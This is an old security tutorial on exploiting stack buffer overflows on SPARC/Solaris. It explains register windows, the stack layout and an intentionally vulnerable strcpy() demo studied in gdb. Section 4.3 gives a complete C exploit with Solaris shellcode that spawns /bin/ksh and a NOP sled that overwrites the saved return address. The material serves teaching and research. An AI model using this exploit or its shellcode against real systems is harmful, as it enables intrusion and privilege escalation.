" IT'S TOASTED "Exploiting SPARC Buffer Overflow vulnerabilities
by pr1 <pr1@u-n-f.com>
----/ Contents
1 - Introduction
2 - Architecture Overview
2.1 - Sparc Registers
2.2 - Sparc Pipeline
2.3 - Instruction Size
2.4 - Function Calls
2.5 - Leaf and Optimized Leaf Procedures
2.6 - Sparc Stack
3 - A Demonstration Vulnerability
3.1 - Studying the overflow in theory
3.2 - Studying the overflow with gdb
4 - Building an exploit
4.1 - Major differences between Sparc and x86
4.2 - Alignment
4.3 - The exploit
5 - Alternative ways of exploiting
6 - Conclusion
7 - References
8 - Greets ----/ 1 - Introduction
Sparc is a RISC architecture build by Sun Microsystems. It´s supported by many
operating systems like Solaris, Linux, OpenBSD, NetBSD,...
As Sun decided to develop Solaris >= 9 for Sparc only and as there
is not much information on Sparc overflows on the net i decided to write
this article. There are some major differences in handling the calling
and returning from functions and stack management on Sparc that are
worth knowing. If you ever asked yourselve: "Why am I unable exploit this
simply strcpy() in main() on Sparc ...". This paper has the answer.
----/ 2 - Architecture Overview
There are 32 general purpose registers on Sparc at any given time.
8 of them are global, these are the "global" registers. They are called
%g0 - %g7 and are consistent during procedure calls. Then there are
another 24 registers in a so called register window. A window consists
of 3 types of registers. The "in", "out" and "local" registers.
A Sparc implementation can have from 2-32 windows thus having
40 - 520 registers. ( remember that the global registers are static )
The variable number of registers is the reason to call Sparc scalable.
At any given time only one window is visible. This window is determined
by the CWP ( current window pointer ) which is part of the PSR ( processor
status register in Sparc V8 ). Its a whole register in Sparc V9.
These instructions are primarily used for procedure calls. The concept is
that "in" registers contain procedure arguments, "local" registers can be
used for storing values while the procedure executes, "out" registers contain
outgoing arguments. The "global" registers are used for values that do not
change much between procedure calls.
The register windows overlap partially. The SAVE operation renames the "out"
registers to become the "in" registers of the called procedure. Because
procedure calls are a quite frequent operation this was meant to improve
performance.
Actually this was a bad idea caused by studies that only considered
insolated programs. The drawback is: With interaction with the system the
registers have to be stored on the stack which results in a lot of slow
store and load instructions.
----/ 2.1 - Sparc Registers
The Registers are organized as follows:
%g0 - %g7 ( %r0 - %r7 ) : global - registers
%o0 - %o7 ( %r8 - %r15 ) : out - registers, they contain arguments for
procedure calls
%l0 - %l7 ( %r16 - %r23 ): local - registers, use them for local variables
%i0 - %i7 ( %r24 - %r31 ): in - registers, after a procedure call these
registers contain incoming arguments
Some special registers:
%g0 : always contains zero ( hardwired )
%sp ( %o6 ): the stack pointer, points to the top of the stack frame
( the last element pushed onto it )
%o7 : called subroutines return address
%fp ( %i6 ): the frame pointer, points to the bottom of the stack frame
%i7 : subroutine return address ( return address - eight )
%o0 : return value from called subroutine
----/ 2.2 - The Sparc Pipeline
The Sparc Architecture uses a pipeline to improve performance. A pipeline
is used to fetch/execute more instructions in the same time as without a
pipeline. Usually there are several steps until a CPU finishes the execution
of an instruction. The instruction has to be fetched, decoded, executed,
branches have to be completed ( pc = npc ) and results have to be written
to the destination.
Doing all this things and then start from the beginning with the next instruction
is a waste of time. Thus a pipeline was implemented to fetch instructions. While
it decodes the first instruction it fetches the next one... and so on.
Using this technique several instructions can be executed almost in
parallel. How these steps are implemented differs from pipeline to pipeline.
The Sparc pipeline has a depth of two. Hence there is a PC and a nPC
( next Program counter pointing to the next instruction to be executed ).
nPC is always copied into PC after the current instruction was executed.
You might ask yourself what happens if the CPU executes a branch instruction
( jumps somewhere ) and already has the next instrucion in the pipeline.
It´s unknown at compile time whether this branch will be taken or not.
The allready fetched instruction could simply be discarded but this
would be a perfomance lost. Thus the Sparc architecture executes the
instruction following the branch instruction before the branch is taken.
e.g.: call subroutine ---/ 2.3 - Instruction size
The x86 instructions differ in their length. Sparc uses a pipeline to
improve perfomance and the designers found it easier to implement every
instruction as a four byte opcode sequence. But this also means that a
NOP has a length of four bytes as well. Usually this would be a little problem
( consider what happens if we jump into the middle of a NOP ).
Because we have to care about alignment this problem vanishes soon
though.
---/ 2.4 - Function calls
The Sparc architecture uses the call/ret instruction pair to implement
procedure calls. Both the CALL and RET instruction are so called synthetic
instructions. The hardware equivalent instruction
( the instruction assembled into the binary ) is a jump ( jmpl ).
Note "l" stands for link not for long.
The assembler plays a bigger role on executinoi speed on RISC than on CISC:
* The assembler reorders instruction to a logical eqivalent
procedure to prevent different pipeline hazards.
* It also optimizes branch delay slots via placing instructions
in there.
* It inlines macros of synthetic instructions or even compounds
instructions.
For example:
* call subroutine == jmpl subroutine,%o7
( remember that %o7 contains the called subroutines return address )
* ret == jmpl %i7+8,%g0
( remember that %i7 is ret address - 8, %g0 always
contains zero )
The CALL instruction saves the current value of PC in %o7, updates PC and
sets nPC to the address specified in the CALL.
The RET instruction updates PC and sets nPC to %i7+8. 8 bytes are added to
the address because the address saved in %i7 is the address of the call
instruction. Because all instructions have a size of four bytes and there is a
branch delay slot of four bytes after the call we have to skip eight bytes.
%i7 is used instead of %o7 because the SAVE instruction renamed the "out"
register to "in" registers.
Next thing a procedure does is building some stack space to store automatic
( local ) variables, compiler temporaries, pointer to return value, ...
This is done with the SAVE and RESTORE instructions.
* SAVE:
The SAVE instruction reserves stack space for the above mentioned
things. Its syntax is:
save %sp, imm(ediate value), %sp.
SAVE now makes the old %sp the new %fp, adds imm to the old %sp and
stores the new value in the new %sp. Because the stack grows down
imm should be a negative value. The CPW flag in the PSR
register is also decremented. ( out registers become in registers ).
Note that on Sparc V9 the behaviour is a little different. Sparc V9
has a seperate register for CWP. SAVE increments the CWP and RESTORE
decrements it.
* RESTORE:
RESTORE now increments CWP ( Sparc V9 decrements ) the CPW.
In registers become the out registers. The eight input registers and the
eight local registers are restored to the values they contained
before the most recent SAVE instruction. The restore instruction
then acts like an add instruction except that the source registers
are from the old register set and the destination register is from
the new register set. Making %fp the new %sp.
A procedure epilogue and prologue thus look like:
save %sp, -368, %sp
....
....
....
ret
restore
Restore is executed one slot later in the pipeline, but its effects take
place before ret changes the %pc.
---/ 2.5 - Leaf and Optimized Leaf Procedures
A leaf procedure is a procedure that does not call any other procedures.
A routine that does not allocate a register window of its own by calling
the SAVE instruction is termed an optimized leaf procedure.
One way to recognize an optimized leaf procedure is by scanning the output
of the assembly code instructions and noting the absence of a SAVE
instruction. Leaf routines do not have a stack frame allocated to them.
Leaf routines use their caller's stack frame and register window.
If the routine is leaf the previous frames PC should be looked up in
register %o7. Otherwise it needs to be looked up in register %i7, which is
what register %o7 becomes after a SAVE instruction. This is what defines
leafness.
---/ 2.6 - The Sparc Stack
High Addresses
/-----------------------\
%fp -> cw | automatic variables |
\-----------------------/
/----------------------------------\
cw | space allocated with alloca() |
\----------------------------------/
/----------------------------------\
cw | space for compiler temporaries |
\----------------------------------/
/----------------------------------\
cl | outgoing parameters |
\----------------------------------/
/----------------------------------------\
cl | copies of outgoing parameters |
\----------------------------------------/
/----------------------------------------\
cl | one word ( hidden parameter ) |
\----------------------------------------/
/-----------------------------------------------\
%sp -> cl | 64 byte for possible copy of register window |
\-----------------------------------------------/
Low Addresses
The stack consists of 2 parts:
Current Workspace ( cw ):
The current workspace is used by C procedures. It consists of
automatic variables, space allocated by alloca() and space for
compiler temporaries. When writing an assembly routine you only
have to calculate space for temporary values you need.
Call Linkage ( cl ):
This space is required to save outgoing registers and the register
window when control passes to another procedure.
The Call Linkage is important for exploiting Sparc overflows.
The minimum stack frame size is 96 byte.
It consists of:
* 64 bytes for copy of register window
* 6 * 4 bytes for outgoing parameters
* 4 bytes for the hidden parameter
This are only 92 byte but the stack and frame pointer
require to be on a eight byte boundary ( 92 is not divisible by eight ).
Hence the minimum stack frame size is 96 byte.
The reason to be on a eight byte boundary is that there is at least space for one
temporary variable.
As the current workspace contains a dynamically allocated field( alloca() ).
We can not tell how much blocks this will be at compile time. Hence automatic
variables are accessed via %fp as negative offsets and the others are
accessed via %sp as positives offsets.
----/ 3 - A demonstration vulnerability
Not every buffer overflow is exploitable on Sparc. We need at least one
level of nesting function to be able to exploit it.
void copy( const char *a ){
char buf[256];
strcpy(buf,a);
}
main( int argc, char *argv[] ) {
copy( argv[1] );
}
---/ 3.1 - Studying the overflow in theory
Let us recall what happens on function calls and function returns.
%i7 contains main´s return address. It will return into exit()
in _start to perform cleanup before program termination.
main() calls copy(), jmpl ( call ) saves the return address back
into main() in register %o7 and the SAVE instruction in/decrements
the register window renaming %o7 into %i7. %i7 is allready filled with
main´s() return address into exit() though. Thus main´s() register
window is stored on copy´s() stack frame. %i7 contains now copy´s()
return address back into main.
strcpy() follows the same algorithm.
After strcpy() overwrites parts of our stack we also overwrite copy´s()
initial stack frame. Strcpy´s() stack frame and its stored return
address back into copy() are still intact and strcpy() returns back
into copy(). All register contents are still intact but copy´s() stack
frame is damaged. Copy() finally restores and jumps back to main(). But
main´s() register window was saved on copy´s() stack frame and damaged
by our overflown strcpy(). When returning back into main() the
saved/damaged register window is restored. The input and local registers
now contain user supplied data. When main() returns it would usually jump
into exit() in _start to perform cleanup, but as we changed the return
address it jumps into nowhere ( 0x61616161 ) and dies with a SIGBUS error.
---/ 3.2 - Studying the overflow with gdb
Let us feed this into gdb and see what happens. Note that i have deleted
redundant information like static registers that are not saved in the
register windows to shorten the output and to make the overflowing
process clearer.
This are our registers in main before copy is called.
(gdb) info register
sp 0xffbef838
o7 0x106c0
l0 0xc
l1 0xff3400a4
l2 0xff33c5d8
l3 0x0
l4 0x0
l5 0x0
l6 0x0
l7 0xff3e6694
i0 0x2
i1 0xffbef90c
i2 0xffbef918
i3 0x20870
i4 0x0
i5 0x0
fp 0xffbef8a8
i7 0x104c8
This is our stack frame before copy() is called.
Thats our saved register window. Note the saved PC at 0xffbef874.
(gdb) x/96x $sp
%sp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000 [%l0 - %l3]
0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694 [%l4 - %l7]
0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870 [%i0 - %i3]
0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 [%i4 - %i7]
. . . . .
. . . . .
. . . . .
%fp -> 0xffbef9a8: 0x00000003 0x00010034 0x00000004 0x00000020
Breakpoint 5, 0x10610 in copy ()
Register values in copy() before the call to strcpy().
(gdb) info register
sp 0xffbef6c8
o7 0x0
l0 0x0
l1 0x0
l2 0x0
l3 0x0
l4 0x0
l5 0x0
l6 0x0
l7 0x0
i0 0xffbefa37
i1 0xffbef910
i2 0xffbef90c
i3 0x300
i4 0x2371c
i5 0xff29bbc0
fp 0xffbef838
i7 0x10640
And the stack frame befor the strcpy() call. Note how the saved register
window ( of main() ) moved "below" our input buffer.
This is the register window of copy(). We will not be able to overwrite the
PC at 0xbffef704 because its "above" our input buffer. This PC contains
the return address back to main.
(gdb) x/96x $sp
%sp -> 0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300
0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640 [saved PC]
. . . . .
. . . . .
. . . . .
buf -> 0xffbef728: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbef738: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbef748: 0x00000000 0x00000000 0x00000000 0x00000000
. . . . .
. . . . .
. . . . .
%fp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000
0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694
0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870
0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 0xffbef728: 0x61616161 0x61616161 0x61616161 0x61616161
0xffbef738: 0x61616161 0x61616161 0x61616161 0x61616161
0xffbef748: 0x61616161 0x61616161 0x61616161 0x61616161
0xffbef758: 0x61616161 0x61616161 0x61616161 0x61616161
. . . . .
. . . . .
. . . . .
0xffbef868: 0x61616161 0x61616161 0x61616161 0x61616161*
[* PC to exit damaged ]
Very nice. We were able to alter main´s() saved PC into exit.
After copy() restores the in and local registers are set to the
"saved/damaged" values. Hence we altered these values due to the overflow
of the input buffer the in and local registers contain our supplied values.
Breakpoint 7, 0x10648 in main ()
(gdb) info register
sp 0xffbef838
o7 0x10640
l0 0x61616161
l1 0x61616161
l2 0x61616161
l3 0x61616161
l4 0x61616161
l5 0x61616161
l6 0x61616161
l7 0x61616161
i0 0x61616161
i1 0x61616161
i2 0x61616161
i3 0x61616161
i4 0x61616161
i5 0x61616161
fp 0x61616161
i7 0x61616161 ----/ 4 - Building an exploit
In this section we will build an exploit for the the vulnerability we just
studied. We also list some differences between x86 and Sparc exploitation
and cover alignment issues.
---/ 4.1 - Differences between x86 and Sparc exploitation
* memory access:
On x86 as on most CISC processors we can write to unaligned memory
addresses without the CPU complaining. Sometimes we only have to
adjust the alignment. Not so on Sparc. See more about alignment at 4.2.
Note that writing to unaligned memory addresses is a CPU feature of
the x86 family. It will complain if the AC ( alignment check ) flag
is set in the flag register.
* call/ret internals:
Because of the internal working of the sparc stack frames and ret/call
pairs we need at least one level of nesting function to be able to
exploit a buffer overflow vulnerability on a Sparc.
* finding the stack base address:
Sparc Solaris uses a different stack base address on different
architectures.
- sun4u: 0xffbe....,
- sun4m: 0xefff....,
- sun4d: 0xdfff....
We can get the stack base address with the following assembler snippet:
unsigned long get_sp( void ) {
__asm__(" or %sp, %sp, %i0 " );
}
* size of overflow:
On a Sparc we usually have to be able to write more than just a
few bytes beyond the target buffer. This is because we have to overwrite
at least %l0 - %l7 and %i0 - %i6 before reaching the saved return address.
* overwriting an address with one byte:
Overflowing an address with one byte on x86 lets us control
the least significant byte. Chances are good that we can
alter some stack address a little bit to point into our shellcode.
As Sparc is a big endian architecture we can only write from most
to least significant byte. Thus we can alter only the most
significant order byte with a one byte overflow. This decreases
our chances of providing some usefull address.
See [3] for more details on one byte overflows.
---/ 4.2 - Alignment
As most other RISC processors Sparc does not allow unaligned memory
accesses. This means we must not read from, write to or jump to any
address that is not on a 4 byte boundary. Otherwise the CPU generates
a Bus Error exception and our program dies. Also consider what happened
if we jumped into the middle of one of our NOPs. Remember that every
Sparc instruction is 4 bytes long. It is very probable that the processor
would generate an Illegal Instruction exception and our program crashed
as well.
That is why we have to take care that our exploit return address is a
multiple of 4, our shellcode lies at a 4 byte boundary in our attack
buffer and our attack buffer itself is a multiple of 4.
---/ 4.3 - Exploiting the vulnerability
Note that we take care about writing only to aligned memory addresses.
If we put our shellcode to some unaligned address in our attack buffer
we will never be able to reach it. Same with the nops. Unaligned nops
makes us jump into the middle of a nop everytime we would reach the nops.
This results in an Illegal Instruction exception and our program dies
without executing our code.
We also have to set %fp to a "save" address or the retl instruction will
crash. A "save" address simply is some stack address. We could also use
our return address to overwrite %fp.
/* Exploits toy vulnerbility on Sparc/Solaris
*
* pr1
* June 2002
*/
#include
/* lsd - Solaris shellcode
*/
static char shell[]= /* 10*4+8 bytes */
"\x20\xbf\xff\xff" /* bn,a */
"\x20\xbf\xff\xff" /* bn,a */
"\x7f\xff\xff\xff" /* call */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0x0b,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh" ;
#define BUFSIZE 336
/* SPARC NOP
*/
static char np[] = "\xac\x15\xa1\x6e";
unsigned long get_sp( void ) {
__asm__("or %sp,%sp,%i0");
}
main( int argc, char *argv[] ) {
char buf[ BUFSIZE ],*ptr;
unsigned long ret,sp;
int rem,i,err;
ret = sp = get_sp();
if( argv[1] ) {
ret -= strtoul( argv[1], (void *)0, 16 );
}
/* align return address */
if( ( rem = ret % 4 ) ) {
ret &= ~(rem);
}
bzero( buf, BUFSIZE );
for( i = 0; i < BUFSIZE; i+=4 ) {
strcpy( &buf[i], np );
}
memcpy( (buf + BUFSIZE - strlen( shell ) - 8),shell,strlen( shell ));
ptr = &buf[328];
/* set fp to a save stack value
*/
*( ptr++ ) = ( sp >> 24 ) & 0xff;
*( ptr++ ) = ( sp >> 16 ) & 0xff;
*( ptr++ ) = ( sp >> 8 ) & 0xff;
*( ptr++ ) = ( sp ) & 0xff;
/* we now overwrite saved PC
*/
*( ptr++ ) = ( ret >> 24 ) & 0xff;
*( ptr++ ) = ( ret >> 16 ) & 0xff;
*( ptr++ ) = ( ret >> 8 ) & 0xff;
*( ptr++ ) = ( ret ) & 0xff;
buf[ BUFSIZE -1 ] = 0;
#ifndef QUIET
printf("Return Address 0x%x\n",ret);
#endif
err = execl( "./vul", "vul", buf, ( void *)0 );
if( err == -1 ) perror("execl");
}
----/ 5 - Alternative ways of exploitation
As we saw very small overruns are not as likely to be exploitable on
Sparc as they are on other platforms. But let us consider some
special cases where you are able to overwrite other sensitive
information on the stack.
An example is overwriting a programs function pointer or jumpbuf with
the address of system and telling it to execute /bin/sh.
See [4] for more information about overwriting such structures.
On sparc the text segment is mapped to small addresses.
If we now try to overwrite this function pointer/jumpbuf with some other
function - address. We can not write this small address into the register
without any 0x00 bytes. This is because we can only write from most to least
significant byte on Sparc.
An alternative way is placing shellcode onto the stack and overwriting
the function pointer with the shellcodes stack address which comprises
eight bytes.
Because of Alignment restrictions on Sparc we can´t exploit format
string vulnerabilities via the "%n" directive.( Writing one byte 4 times )
by using the short qualifier the alignment is emulated either in software
or special machine instructions are used, and you can usually write on every
two byte boundary. See [6] for more information.
The return into libc technique can also be applied on Solaris/Sparc to
defeat non executable stack patches. See [7] for more information.
Dynamic heap overflows via corruption of malloc internal structures
are exploitable on Sparc as well.
See [8] and [9] for a glibc and the SysV malloc implementation and
exploitation discussion.
----/ 6 - Conclusion
We need a bit more luck to be able to exploit Sparc buffer overflows
than their brothers/sisters on x86. In general it is not enough to be
able to overwrite just a few bytes of the buffer. Additionaly we saw that
the way the stack is handled has a great influence on the exploitability
issue of its buffer overrun vulnerabilities. This class of vulnerablities
can not always be exploited on Sparc as there must exist at least one level
of subroutine calls nesting, so that two concurrent ret/restore pairs can be
executed by a vulnerable program after its stack got overrun.
----/ 7 - References
[1] UNF - United Net Frontier
[http://www.u-n-f.com]
[2] Sun Microsystems
Sparc Assembly Language Reference Manual
[http://www.sparc.org]
[3] Klog
Frame pointer overwriting
[http://www.phrack.org/show.php?p=55&a=8]
[4] Matt Conover aka. Shok
w00w00 on Heap Overflows
[http://www.w00w00.org/files/articles/heaptut.txt]
[5] some interesting pdfs about computer architectures
[http://www.segfault.net/~scut/cpu]
[6] Scut
Exploiting Format String vulnerabilities
[http://www.team-teso.net/releases/formatstring-1.2.tar.gz]
[7] Horizon
Return into libc exploits on Sparc/Solaris
[http://packetstormsecurity.nl/groups/horizon/stack.txt]
[8] Maxx
Exploiting dynamic heap overflows via malloc chunk corruption.
[http://www.phrack.org/phrack/57/p57-0x08]
[9] Exploiting dynamic heap overflows via malloc chunk corruption.
[http://www.phrack.org/phrack/57/p57-0x09]
----/ 8 - Greetings
- Big thx to Scut for reviewing the paper
- Svoern for mental support
- all the other UNF fellows